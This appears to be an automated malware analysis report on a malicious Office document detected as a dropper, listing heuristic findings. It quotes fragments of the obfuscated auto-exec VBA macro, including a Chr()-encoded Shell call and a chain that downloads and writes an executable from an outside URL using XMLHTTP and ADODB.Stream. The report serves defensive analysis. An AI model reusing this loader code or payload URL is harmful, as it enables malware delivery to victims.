Malicious Office (OLE) — malware analysis report

Heuristics 10

• ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
• VBA macros detected medium 7 related findings OLE_VBA_MACROS
  Document contains VBA macro code
• Potential Shell call in VBA critical OLE_VBA_SHELL
  Potential Shell call in VBA
  Matched line in script

  Shell Chr(477 - 410) & Chr(496 - 419) & Chr(588 - 488) & Chr(499 - 467) & Chr(860 - 813) & Chr(864 - 765) & Chr(499 - 467) & Chr(864 - 765) & Chr(588 - 488) & _

• Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
  VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  Matched line in script

  Shell Chr(477 - 410) & Chr(496 - 419) & Chr(588 - 488) & Chr(499 - 467) & Chr(860 - 813) & Chr(864 - 765) & Chr(499 - 467) & Chr(864 - 765) & Chr(588 - 488) & _

• VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
  VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script

   " & " & F4g & " V4m= ""http://digitalgit.in/npd.exe"">>L9u.VBS &" & F4g & " I6i = D1x(""npdNexe"")>>L9u.VBS &" & F4g & " Set F5p = CreateObject(D1x(""msxmlRNxmlhttp""))>>L9u.VBS &" & F4g & " F5p.Open D1x(""get""), V4m, False>>L9u.VBS &" & F4g & " F5p.send ("""")>>L9u.VBS  &" & F4g & " Set O2o = CreateObject(D1x(""adodbNstream""))>>L9u.VBS &" & F4g & " O2o.Open>>L9u.VBS &" & F4g & " O2o.Type = 1 >>L9u.VBS  &@eCHo O2o.Write F5p.ResponseBody>>L9u.VBS &" & F4g & " O2o.Position = 0 >>L9u.VBS &" & F4 …

• Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script

  Shell Chr(477 - 410) & Chr(496 - 419) & Chr(588 - 488) & Chr(499 - 467) & Chr(860 - 813) & Chr(864 - 765) & Chr(499 - 467) & Chr(864 - 765) & Chr(588 - 488) & _

• CreateObject call high OLE_VBA_CREATEOBJ
  CreateObject call
  Matched line in script

   " & " & F4g & " V4m= ""http://digitalgit.in/npd.exe"">>L9u.VBS &" & F4g & " I6i = D1x(""npdNexe"")>>L9u.VBS &" & F4g & " Set F5p = CreateObject(D1x(""msxmlRNxmlhttp""))>>L9u.VBS &" & F4g & " F5p.Open D1x(""get""), V4m, False>>L9u.VBS &" & F4g & " F5p.send ("""")>>L9u.VBS  &" & F4g & " Set O2o = CreateObject(D1x(""adodbNstream""))>>L9u.VBS &" & F4g & " O2o.Open>>L9u.VBS &" & F4g & " O2o.Type = 1 >>L9u.VBS  &@eCHo O2o.Write F5p.ResponseBody>>L9u.VBS &" & F4g & " O2o.Position = 0 >>L9u.VBS &" & F4 …

• VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
• Document_Open macro low OLE_VBA_DOCOPEN
  Document_Open macro
  Matched line in script

  Private Sub Document_Open()

• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://digitalgit.in/npd.exe Referenced by macro

  • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Open this report in the interactive analyzer, or submit your own file for analysis.